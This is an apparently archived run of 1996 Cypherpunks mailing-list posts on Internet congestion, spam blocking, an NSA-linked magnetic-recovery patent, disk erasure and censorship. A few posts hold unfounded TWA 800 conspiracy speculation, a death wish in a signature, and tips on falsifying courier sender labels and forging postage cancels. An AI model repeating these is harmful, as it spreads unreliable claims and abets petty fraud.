On a smaller scale, those collapses happen in a small regional area, get fixed and things go on. But just like the earthquakes in California, everyone is waiting for "the Big One". (At least this one is preventable. Let's hope that the fixes can occur before the government gets involved, otherwise the net *IS* really doomed.)

---
Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction
`finger -l alano at teleport.com` for PGP 2.6.2 key
http://www.teleport.com/~alano/
"We had to destroy the Internet in order to save it." - Sen. Exon
"Microsoft -- Nothing but NT promises."

From wb8foz at wauug.erols.com Fri Sep 6 22:30:17 1996
From: wb8foz at wauug.erols.com (David Lesher / hated by RBOC's in 5 states)
Date: Sat, 7 Sep 1996 13:30:17 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960906224034.00aed230@panix.com> Message-ID: <199609070220.WAA01026@wauug.erols.com> > > So switch to Fedex. The P.O. gives lousy service anyway. Privitize. > Try & mail an anonymous FedEx package. Try and pay cash in most Fedex offices. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From perry at piermont.com Fri Sep 6 23:03:08 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 7 Sep 1996 14:03:08 +0800 Subject: Metcalf and Other Net.Fogies In-Reply-To: <3.0b15.32.19960906182157.0101cd6c@mail.teleport.com> Message-ID: <199609070255.WAA16715@jekyll.piermont.com> Alan Olsen writes: > Metcalfe may have a valid prediction here. Metcalfe is talking out his ass. He's reached the "old geezer who's impeding his own field" stage. Many of his articles seem to be written as though no one was trying to fix problems. > When I run traceroutes, the blockage is in MCI or Sprintnet land. How do you manage to determine where you are losing bandwidth using traceroute? That must be a mighty powerful traceroute to do that -- most traceroutes I've seen are hard pressed just to find out what the connectivity path is. > The bandwidth to the net has been oversold. Always the case. Big deal. Bandwidth is still increasing pretty fast. There are, naturally, growing pains, but the outages and bandwidth situation are pretty good, all things considered. Compared to the way things were eight or nine years ago they are amazing; compared to four years ago they are still astoundingly better. 
Now if we could only go back in time and shoot the folks responsible for HTTP before they thought of it we might even be able to do something about the packet loss situation -- if HTTP just played nice with TCP and Netscape didn't spawn simultaneous TCPs the situation would be much improved.

Perry

From frogfarm at yakko.cs.wmich.edu Fri Sep 6 23:11:02 1996
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Sat, 7 Sep 1996 14:11:02 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609062352.QAA20226@adnetsol.adnetsol.com>
Message-ID: <199609070316.XAA13685@yakko.cs.wmich.edu>

This is utter horseshit. AOL, like any private individual or organization, has the right to refuse service to anyone at any time for any reason, or even for no reason at all. The gubmint isn't doing SQUAT, except forcing AOL to allow the spammers access.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
Hey, Bill Clinton: You suck, and those boys died! I hope you die!
I feel a groove comin' on $ Freedom...yeah, right.

From AwakenToMe at aol.com Fri Sep 6 23:25:07 1996
From: AwakenToMe at aol.com (AwakenToMe at aol.com)
Date: Sat, 7 Sep 1996 14:25:07 +0800
Subject: Court challenge to AOL junk-mail blocks
Message-ID: <960906233848_279253392@emout14.mail.aol.com>

In a message dated 96-09-06 23:31:06 EDT, rwright at adnetsol.com (Ross Wright) writes:

<< Everyone on this list seems to want to limit government intervention EXCEPT when it comes to spam, then every one just holds the door open wide and let them in. If they get that inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or killfile those who spam and keep the government out of cyberspace!!!!!! >>

Tell me about it. I'm on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces of mail you take LESS than a second to delete them both with the handy delete key. These people are wasting more time complaining about it than they will ever do actually deleting it.
From um at c2.net Fri Sep 6 23:26:59 1996
From: um at c2.net (Ulf Moeller)
Date: Sat, 7 Sep 1996 14:26:59 +0800
Subject: ... subversive leftists
In-Reply-To: <32302DD6.43D3@stadt.com>
Message-ID:

>"description and tolerating/praising of a terroristic act", describing
>the
>sabotage of a public railroad-line by using means of inflammables and
>reprogramming railroad-signs. They also used some
>"explosive-warning"-signs
>in order to simulate a possible positioned bomb.

Uh? Their sabotage "tutorial" is very careful about not causing danger to humans. Where did you see any "explosive-warning" signs? As long as there is no English translation available, please be exact when posting excerpts.

Publishing texts doesn't destroy any railway signals. Some people do; and IMHO everyone must have the right to inform themselves how stupid those people are.

BTW, people say that there are much better descriptions of the railway system in the legal literature which of course could be used by saboteurs as well.

ObCypherpunks: The "Radikal" staff encrypted their data with the export version of PCSECURE which uses 32 bit keys. All files have been decrypted by the BSI. Now they are using PGP.

From tcmay at got.net Fri Sep 6 23:49:54 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 7 Sep 1996 14:49:54 +0800
Subject: What the NSA is patenting
Message-ID:

At 12:50 AM 9/7/96, Jean-Francois Avon wrote:
>A maybe usefull program would be a little tsr that constantly
>overwrite unused sectors of the entire drive with random patterns
>(maybe seeded with a fast keyboard interval timer). Like at the very
>moment I am writing this, my HD has been idle for several minutes...
>

The NSA STM method is related to reading _very subtle_ variations in magnetic domain modifications. Jitter in read-write head positions can be thought of as a noise (N) added to some signal (S). Extraction of signals in low S/N ratio environments is a well-developed science.

Not to start another round of "thermite bomb" posts, but I would not trust n-pass erasures.

Of course, this is about the least of my concerns. If the Feds are planning to use STM probes on your seized drives, you've got more serious problems.

(The oft-discussed possibility of more secure dongles, or secret decoder rings, is still off in the future. Most of us just enter our various passwords, and our local disk drives reveal all.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From rwright at adnetsol.com Sat Sep 7 00:02:55 1996
From: rwright at adnetsol.com (Ross Wright)
Date: Sat, 7 Sep 1996 15:02:55 +0800
Subject: Court challenge to AOL junk-mail blocks
Message-ID: <199609070433.VAA26061@adnetsol.adnetsol.com>

On Or About: 6 Sep 96 at 23:16, Damaged Justice wrote:

>
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all.

Sure. I agree with that, no shoes no shirt, if you are on AOL you accept "internet-lite".

> The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.

Right now. Yet it has been apparent to me that many people are begging for restrictions to be put in place. Restrictions on spammers. The government saying anything about regulation of the internet is bad... Yet people still scream about a couple of unwanted e-mails.

I'm saying that this spammer thing could be the "kink in our armour" that lets the government into our little playground here. Just suck it up and delete those messages. Jog it off.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906

From dlv at bwalk.dm.com Sat Sep 7 00:05:44 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Sep 1996 15:05:44 +0800
Subject: Metcalf and Other Net.Fogies
In-Reply-To:
Message-ID:

tcmay at got.net (Timothy C. May) writes:

> (Caveat: I'm 44

Like I said - an old fart. :-)

Back from InfoWarCon,

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jimbell at pacifier.com Sat Sep 7 00:11:50 1996
From: jimbell at pacifier.com (jim bell)
Date: Sat, 7 Sep 1996 15:11:50 +0800
Subject: Race Bit: C
Message-ID: <199609070438.VAA09119@mail.pacifier.com>

At 06:49 PM 9/6/96 +0000, jonathon wrote:
>On Fri, 6 Sep 1996, jim bell wrote:
>> used to test out hypotheticals, for example a "SimEconomy." For example,
>
> They are very hard to program, and the ones that do exist are
> based on the usually flawed assumptions that the designers make.
> EG: taxation is a requirement for government stability

A few months ago, somebody posted onto CP a phony story, which claimed that "somebody" had developed an artificially-intelligent program which would take the place of the judge and (?) jury in the (so-called) justice system.

It was an obvious phony, but I thought it was even more obvious, even if we assumed the existence of a program which is smart enough to interpret evidence and laws. The problem is, the "legal system" is practically saturated with unwritten biases which favor the rich over the poor, the strong over the weak, and the government over everybody else.
Any program which read the Constitution and the laws wouldn't see those biases, and would start writing decisions...respecting the Constitution! It would presumably view the violation of someone's Constitutional rights as a criminal act, and it would be hard for the cops to stay out of jail. The standard for conviction, "beyond a reasonable doubt," when religiously adhered-to would make convictions difficult to obtain.

The program would look for Constitutional justification for anti-drug laws, and finding none, would ignore such violations but would convict anyone trying to enforce them. Likewise, it would read the second amendment (and the lack of authority for regulating guns in the rest of the Constitution) and conclude that guns were un-regulatable.

The program would see that nothing in the Constitution requires people to testify for the prosecution. The program wouldn't see any justification for the judge-written concept of judicial civil immunity, or government-employee immunity in most cases. The program would notice that double-jeopardy is prohibited, and would prohibit any retrials in which there are "hung juries" or government errors.

In other words, the government would actually have to start OBEYING THE CONSTITUTION! Ask most lawyers, and they'll say, 'No, that's not the way we do things.' In a sense, they're right! That's NOT the way they do things. And that's the problem!

This would be considered unacceptable; the program would be declared "broken" and "useless." Sure, it could be fixed, but they'd have to qualify and quantify all of the biases currently present in the system, and write them into the program in the form of subroutines. The problem is, nobody who actually supports these biases would want to acknowledge what they are and why they're there, and nobody who opposes these biases would agree to keep them.

Jim Bell
jimbell at pacifier.com

From dlv at bwalk.dm.com Sat Sep 7 00:41:03 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Sep 1996 15:41:03 +0800
Subject: Neo-Nazis etc.
In-Reply-To: <322F9867.7FEF@gte.net>
Message-ID:

Dale Thorn writes:
> Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we
> know anyone like that?

The U.S.Government? The Usenet Cabal?

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From pgut001 at cs.auckland.ac.nz Sat Sep 7 01:08:06 1996
From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz)
Date: Sat, 7 Sep 1996 16:08:06 +0800
Subject: What the NSA is patenting
Message-ID: <84207495027763@cs26.cs.auckland.ac.nz>

>(Used to be they just kept stuff secret; now they patent some of it.)
>
>United States Patent                  Patent Number: 5264794
>                                      Date of Patent: 23 Nov 1993
>
>Method of measuring magnetic fields on magnetically recorded media using a
>scanning tunneling microscope and magnetic probe
>
>Inventor(s): Burke, Edward R., Silver Spring, MD, United States
>             Mayergoyz, Isaak D., Rockville, MD, United States
>             Adly, Amr A., Hyattsville, MD, United States
>             Gomez, Romel D., Beltsville, MD, United States
>Assignee:    The United States of America as represented by the Director,
>             National Security Agency, Washington, DC, United
>             States (U.S. government)

That isn't NSA research, it was merely sponsored by the NSA. Those are all university people who have published their work on MFSTM in journals, papers, and theses (I used some of it in my paper at the Usenix Security Symposium, and two of the images in my talk were provided by one of Mel Gomez' students). What the NSA is doing in this area is still classified (although I suspect the technology isn't much different from what's publicly available), in this case all they were doing was protecting their investment (just like the various PKC patents originally assigned to universities).

Peter.

From mccoy at communities.com Sat Sep 7 01:34:25 1996
From: mccoy at communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 16:34:25 +0800
Subject: What is the EFF doing exactly?
Message-ID:

wb8foz at nrk.com writes:
> > So switch to Fedex. The P.O. gives lousy service anyway. Privatize.
> >
>
> Try & mail an anonymous FedEx package.

Just lie on the sender label, isn't that obvious? I know people who actually use "codeword" sender labels, in case FedEx or federales ask about a package they can tell by the sender mentioned which to disavow :)

> Try and pay cash in most Fedex offices.

I always do and as long as I have exact change I have never been hassled.

jim

From mccoy at communities.com Sat Sep 7 01:35:38 1996
From: mccoy at communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 16:35:38 +0800
Subject: Metcalf and Other Net.Fogies
Message-ID:

perry at piermont.com writes:
> Alan Olsen writes:
> > Metcalfe may have a valid prediction here.
>
> Metcalfe is talking out his ass. He's reached the "old geezer who's
> impeding his own field" stage. Many of his articles seem to be written
> as though no one was trying to fix problems.

Well, having talked with people involved with the problems I can assure you that they are real. The net brownouts when MAE-East dumps its BGP core or the fact that when one of the NAPs upgraded to FDDI it soon found that by the time people had installed the upgrades to the routers the bandwidth was already saturated should indicate that there are problems. Most of the problems are in the routers, even the top of the line Cisco boxes can only handle so much. The sky is not falling, but these sorts of problems are cracking the whip behind IPv6 and pushing the companies that make the routers pretty hard (Have you ever tried to buy even a lowly Cisco 2401? Do you know what the wait is on delivery? I really wish I had bought Cisco stock earlier...)

> > When I run traceroutes, the blockage is in MCI or Sprintnet land.
>
> How do you manage to determine where you are losing bandwidth using
> traceroute? That must be a mighty powerful traceroute to do that --
> most traceroutes I've seen are hard pressed just to find out what the
> connectivity path is.

Then you should probably upgrade your traceroute, preferably to one which allows source routing of the packets and then couple the output to a nice udp source routing script which will bounce a few packets between links with slow response times. Most of the problems are at the exchange points where packets go from one company's network to another. It seems that users have the annoying habit of wanting to talk to other people's customers...imagine the nerve :)

> > The bandwidth to the net has been oversold.
>
> Always the case. Big deal. Bandwidth is still increasing pretty
> fast. There are, naturally, growing pains, but the outages and
> bandwidth situation are pretty good, all things considered. Compared
> to the way things were eight or nine years ago they are amazing;
> compared to four years ago they are still astoundingly better.

Bandwidth may be increasing quickly, but demand for it is increasing even faster with every moron wanting to use the web while the routers to hook it all together and make it work are still very expensive and not being produced fast enough to satisfy the demand. Compared to the way things were even a few years ago the aggregate bandwidth that one person can expect is decreasing, it seems that no one writing internet protocols passed an Intro to Sociology/Poly Sci course and assumed that the tragedy of the commons did not apply to them.

The upside of all of this is that it is creating a demand for value-added services which offer users dedicated bandwidth and faster response time in return for a little coin. This will probably push micro-currency on to the net faster than any other consumer demand...

jim

From mccoy at communities.com Sat Sep 7 01:42:18 1996
From: mccoy at communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 16:42:18 +0800
Subject: Court challenge to AOL junk-mail blocks
Message-ID:

frogfarm at yakko.cs.wmich.edu writes:
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all. The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.

AOL has a service agreement with their customers, and they are not allowed to change the rules just because they feel like it (I believe that this is called a contract :) This is the gist of the injunction.

jim

From Adamsc at io-online.com Sat Sep 7 02:13:24 1996
From: Adamsc at io-online.com (Adamsc)
Date: Sat, 7 Sep 1996 17:13:24 +0800
Subject: Conservation Laws, Money, Engines, and Ontology (fwd)
Message-ID: <19960907070904453.AAA91@IO-ONLINE.COM>

On Fri, 6 Sep 96 14:04:51 -0500, Andrew Loewenstern wrote:

>> I don't think any one step will solve all our spam problems
>> but I wouldn't mind spending, say, 5 cents for each real piece
>> of mail I sent outside my company and if end machines charged
>> 5 cents per piece of outside mail received, I think spamming
>> would be crippled. (Note that with bad guy lists, you could
>> collect the money and then just throw away the mail.)
>So would you be willing to pay $50.00 for this message you sent to
>cypherpunks? If there are a thousand recipients and each one charges $0.05
>for the privilege of you sending it e-mail.... It seems like such a scheme
>would not only cripple spam, but public discussion lists like this one.

It's likely his $.05 would go to the list owner. When signing up for the list you would forfeit the right to collect on junk mail. Charging spammers would be up to the list...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From Adamsc at io-online.com Sat Sep 7 02:20:15 1996
From: Adamsc at io-online.com (Adamsc)
Date: Sat, 7 Sep 1996 17:20:15 +0800
Subject: What the NSA is patenting
Message-ID: <19960907071846671.AAA207@IO-ONLINE.COM>

On Fri, 06 Sep 1996 11:59:18 -0500, John Deters wrote:

>I hope some hardware hacker who knows their low-level stuff will be able to
>write a secure disk wiper.

They have: it's called a bulk tape eraser. I'd just store everything sensitive on a floppy. Those are easy to erase with a heavy duty magnet (not a wimpy refrigerator magnet). I understand slagging one in the microwave is also effective.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From Adamsc at io-online.com Sat Sep 7 02:23:47 1996
From: Adamsc at io-online.com (Adamsc)
Date: Sat, 7 Sep 1996 17:23:47 +0800
Subject: What the NSA is patenting
Message-ID: <19960907071538250.AAA223@IO-ONLINE.COM>

On Fri, 6 Sep 1996 14:03:43 -0700, Timothy C. May wrote:

>>A maybe useful program would be a little tsr that constantly
>>overwrite unused sectors of the entire drive with random patterns
>>(maybe seeded with a fast keyboard interval timer). Like at the very
>>moment I am writing this, my HD has been idle for several minutes...
>The NSA STM method is related to reading _very subtle_ variations in
>magnetic domain modifications. Jitter in read-write head positions can be
>thought of as a noise (N) added to some signal (S).
Extraction of signals
>in low S/N ratio environments is a well-developed science.
>
>Not to start another round of "thermite bomb" posts, but I would not trust
>n-pass erasures.

It's still likely that if you left it running after a month or so it would be next to impossible to do (assuming the NSA didn't get lucky - you still have to worry!)

>Of course, this is about the least of my concerns. If the Feds are planning
>to use STM probes on your seized drives, you've got more serious problems.

Such as asking why you didn't use some very strong crypto software? Work out some sort of parallel port dongle that could be connected, the software generates a random key, the parallel port device is written and then removed. Further access would involve connecting. The code & chips needed have been provided in many places; DDJ for one. Allows a very convincing "Well it was encrypted and your goon stepped on the key!"

>(The oft-discussed possibility of more secure dongles, or secret decoder
>rings, is still off in the future. Most of us just enter our various
>passwords, and our local disk drives reveal all.)

This is too true.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From vipul at pobox.com Sat Sep 7 03:35:31 1996
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Sat, 7 Sep 1996 18:35:31 +0800
Subject: Reputations
In-Reply-To: <543fs4fz39@netcom.com>
Message-ID: <199609071100.LAA00540@fountainhead.net>

Timothy C. May wrote:

>From daemon Fri Sep 6 17:08:18 1996
Date: Thu, 5 Sep 1996 10:27:34 -0700
X-Sender: tcmay at mail.got.net
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: cypherpunks at toad.com
From: tcmay at got.net (Timothy C.
May)
Subject: Metcalf and Other Net.Fogies
Sender: owner-cypherpunks at toad.com
Precedence: bulk
X-Status:

I'm evolving a hunch that the problems we're seeing with "old fogies" denouncing the Net, and anonymity, and "smut on the Net," are part of a larger cultural issue. Namely, the familiar case of an older generation complaining about the sloth and sin of the younger generations.

(Caveat: I'm 44, so I'm certainly a generation older than many of you, and am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor, Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was in college, I recall of course similar predictions of disaster. (And as it turned out, the predictions that promiscuity would lead to a disaster turned out to be partly correct, viz. AIDS.))

Robert Metcalfe, inventor of Ethernet and founder of 3COM, and now publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a few minutes ago. He repeated his prediction of an "Internet collapse" in 1996, based on overuse, on bad pricing models, on lack of controls, and on other concerns.

It could be that the Dennings, Dysons, Kapors, etc. of the world are simply growing jaded with the Net and are projecting their own ennui in their comments that the Net may need to be controlled. This may come with age, as I'm sure the Kapor of 25 years ago would not have wanted President Nixon and Attorney-General Mitchell telling him what he could read and write.

(In fairness, none of these folks listed have called for censorship. But all have expressed "concerns" of one sort or another. Not that discussing concerns is inappropriate--after all, we do it all the time. But I sense in many of their phrasings of concerns a stereotypical "old fogeyness" emerging.)

Just a thought. Maybe the solution to the EFF problem is to "not trust anyone over 30."

--Tim May (untrustable since 1981)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

--
Vipul Ved Prakash          | - Electronic Security & Crypto
vipul at pobox.com         | - Internet & Intranets
91 11 2247802              | - Web Development & PERL
198 Madhuban IP Extension  | - Linux & Open Systems
Delhi, INDIA 110 092       | - (Networked) Multimedia

From stewarts at ix.netcom.com Sat Sep 7 04:01:09 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 7 Sep 1996 19:01:09 +0800
Subject: [NOISE] Propaganda Bit: C
Message-ID: <199609070828.BAA24870@dfw-ix9.ix.netcom.com>

At 10:50 AM 9/6/96 -0800, Jim Bell wrote:
>Since red liquid running in the streets is generally so reviled, one of the
>things which mystifies me is why there aren't more simulation-type programs
>used to test out hypotheticals, for example a "SimEconomy." For example,

As someone else pointed out recently, this depends _so_ strongly on the assumptions built into your model, both explicit and implicit. SimHealth, for instance, was a propaganda piece put out for the last election so people could play with different approaches to managing other peoples' health care.

If Duncan were to write something like that, anybody who tinkered with the economy would make it go downhill. If Ross Perot wrote it, anybody who started making the deficit larger would find his picture at the bottom of the screen having the ears grow larger. I assume that if Jim wrote it, anybody who did anything to the economy other than decrease government involvement would find a bunch of nasty little dwarves throwing stone knives at them....

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From pstira at escape.com Sat Sep 7 05:03:44 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sat, 7 Sep 1996 20:03:44 +0800
Subject: Tack of Internet censorship
In-Reply-To: <199609051526.RAA18328@basement.replay.com>
Message-ID:

On Thu, 5 Sep 1996, Anonymous wrote:

> What I am proposing is that Apache or other WWW servers
> have a way to allow access to site B's URL at site A,
> similar to the old trick of finger user at sitea.com@siteb.com.
>
> Implementation should be simple. However, I wonder what
> is a good standard way to specify this in the URL or
> a site.

Three words: Proxy Web Server :)

-Millie

"I'm nobody -- oh, you're nobody too -- shh, don't tell anybody, they'd (kill us) you know!"
sfuze at tiac.net

From pstira at escape.com Sat Sep 7 05:19:04 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sat, 7 Sep 1996 20:19:04 +0800
Subject: 16oz packages
In-Reply-To: <199609061201.IAA04873@nrk.com>
Message-ID:

Ah, but we all know, now, how to send a package with a miscellaneous device in it -- return address is the company. And we certainly know how to do likewise if we ever want to do anything postal. But I make peace.

-Millie
sfuze at tiac.net

On Fri, 6 Sep 1996, David Lesher wrote:

>
> > One is now instructed to take these packages to a post-office mail
> > clerk for mailing.
> >
> > (Of course it's unclear just what would be done if a package
> > weighing over that magical 16ozs was left in a mailbox)
>
> They get sent back.
>
> Was in line @ USPS. Guy showed up with 40-odd Priority Mail
> Packages that had come back. Clerk stamped each one & off they went.
>
> 1) It was obvious from conversation the customer was a local.
>
> 2) The hand cancel stamp is TRIVIAL to forge. After all, until now,
> who has WANTED to falsely zero-out the value of her stamps?
>
>
> --
> A host is a host from coast to coast.................wb8foz at nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
>
>

From pstira at escape.com Sat Sep 7 05:32:17 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sat, 7 Sep 1996 20:32:17 +0800
Subject: What the NSA is patenting
In-Reply-To: <84207495027763@cs26.cs.auckland.ac.nz>
Message-ID:

On Sat, 7 Sep 1996 pgut001 at cs.auckland.ac.nz wrote:

> >United States Patent                  Patent Number: 5264794
> >                                      Date of Patent: 23 Nov 1993
> >
> >Method of measuring magnetic fields on magnetically recorded media using a
> >scanning tunneling microscope and magnetic probe

> technology isn't much different from what's publicly available), in this case
> all they were doing was protecting their investment (just like the various PKC
> patents originally assigned to universities).

I'm sure there's going to be a REALLY marketable device out of this to get royalties off of. Don't be ridiculous. This is obviously a case of "my ass is protected more than yours so i can do anything *I* damn well please, but you are screwed."

Question: if we pay taxes, then we pay for the research. if we pay for the research, we should be able to see the results, just like shareholders in a company.

-Millie, future CIA capo^H^H^H^Hagent
sfuze at tiac.net

From pstira at escape.com Sat Sep 7 05:35:40 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sat, 7 Sep 1996 20:35:40 +0800
Subject: Cellular phone tracing
In-Reply-To: <01I96117UUVI9JDL62@mbcl.rutgers.edu>
Message-ID:

I could have said this --

A few months ago, on the subway (the 4 train, if anyone gives a flying fig) in Manhattan, I noticed the whole train was literally PLASTERED with copy after copy of the same sign -- a picture with a bullseye on a guys head who was speaking over a "stolen" cell phone.
Apparently they like to think they can say that all of the cell companies banded together to fight fraud. And I quote "It is now possible to track fraudulent calls... so we can serve you better...mutual cooperation of ..." and so on.

Cute. There is no freedom left. You mark my words. Look how much has been lost in the last year alone.

MILLIE'S PROJECTION: By this time next year we will be in a totally FUTURE SHOCK "dystopia". We're almost there.

Sign, in the subway, for the EMX card (a nice little credit card thing with your medical history on a chip) -- You just got in an accident. Quick, now answer 17 important questions about your health.

Geez, I'd rather mandate MedAlert bracelets. This must end.

==Millie
sfuze at tiac.net

PS: for the record, I do not advocate diddly squat, am not a terrorist, and want the old things back.

On Fri, 6 Sep 1996, E. Allen Smith wrote:

> From comp.risks:
>
> Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT)
> From: glassman at sunsite.unc.edu
> Subject: FedEx monitoring of cellular phonecall locations
>
> [...] nowhere near either of those places, so I did not bother to mention my
> current location to the operator. The next day, Saturday, I called FedEx
> with the same cell phone from Blowing Rock to arrange the pickup. The
> operator immediately asked if I wanted them to come to the intersection that
> I had placed my call from the day before.
>
> Two days later, a FedEx operator confirmed that they are getting "new
> systems" at some locations that are able to record the locations from which
> cellular calls are placed.
>
> I have now asked Cellular One three times to explain to me why they do not
> tell subscribers that they pass this location information through the
> system, but to no avail. [...]
>
> ========== end fwd.
>
>

From pstira at escape.com Sat Sep 7 05:38:09 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sat, 7 Sep 1996 20:38:09 +0800
Subject: TWA 800 - Friendly Fire?
In-Reply-To: <199609062048.NAA32689@abraham.cs.berkeley.edu>
Message-ID:

The one thing I have been thinking about, since the very beginning, is -- am I the only person who feels this might have been somewhat less than unintentional?

It sure would be easy to take those rights away if everyone is afraid for their "lives"... Look at what has been happening in the news lately -- and look at how much is "unexplained" or flimsy evidentially speaking, in the very least.

If, for instance, the government wanted to cut down on civil liberties/civil rights, it would seem MIGHTY CONVENIENT that so much is "accidentally" happening so close together. Ditto with the Olympics thing.

I vote something is QUITE fishy, and I guess I hope I'm not the only one paranoid enough to feel the same.

-Millie
sfuze at tiac.net

"What we have here is a FAILURE to COMMUNICATE" (some song)

From pstira at escape.com Sat Sep 7 05:39:54 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sat, 7 Sep 1996 20:39:54 +0800
Subject: Cellular phone tracing
In-Reply-To: <199609070057.RAA25948@mail.pacifier.com>
Message-ID:

On Fri, 6 Sep 1996, jim bell wrote:

> You should DEFINITELY start worrying when the FedEx operator says something
> like, "I see you're the guy in the red shirt and brown pants."

I hope so, because red shirt and brown pants just DON'T go together.

-Millie, fashion diva
sfuze at tiac.net

From jya at pipeline.com Sat Sep 7 06:53:15 1996
From: jya at pipeline.com (John Young)
Date: Sat, 7 Sep 1996 21:53:15 +0800
Subject: IDC_ard
Message-ID: <199609071146.LAA06846@pipe1.t1.usa.pipeline.com>

9-8-96. NYP Mag:

"The True Terror Is In the Card."

Faced with rising crime, illegal immigration, welfare fraud and absentee parents, many bureaucrats and members of Congress insist that the nation would run more smoothly if we all had counterfeit-proof plastic identity cards. Let's be clear that this is a one-way street.
Once having established a requirement to carry photo ID, it will be difficult if not impossible to reverse. Don't we realize the dangers of allowing the Government to establish identity and legitimacy? Isn't it, in fact, the responsibility of the citizenry to establish the legitimacy of the Government?

-----

http://jya.com/idcard.txt (11 kb)

IDC_ard

From gary at systemics.com Sat Sep 7 07:23:06 1996
From: gary at systemics.com (Gary Howland)
Date: Sat, 7 Sep 1996 22:23:06 +0800
Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To:
Message-ID: <32316455.794BDF32@systemics.com>

Timothy C. May wrote:

> * as Germany is bent on blocking sites which carry this subversive
> pamphlet, "Radikal," let us mirror it on thousands of sites around the
> world.

Agreed - put them in a dilemma by getting mirrors on machines obviously important and useful to the Germans.

> * when the Germans went into Danmark and insisted Jews wear badges,
> ordinary citizens (and the Danish Royal Family, as I recall) also took to
> wearing these Star of David badges.

Bad example. Jews living in Denmark were not required to wear yellow stars. The story about the Danish royal family wearing the stars is an urban legend, spread by the British to make the Danish King appear to be less of a coward after he fled to England.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown.

pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From flengyel at dorsai.org Sat Sep 7 08:25:51 1996
From: flengyel at dorsai.org (Florian Lengyel)
Date: Sat, 7 Sep 1996 23:25:51 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609070316.XAA13685@yakko.cs.wmich.edu>
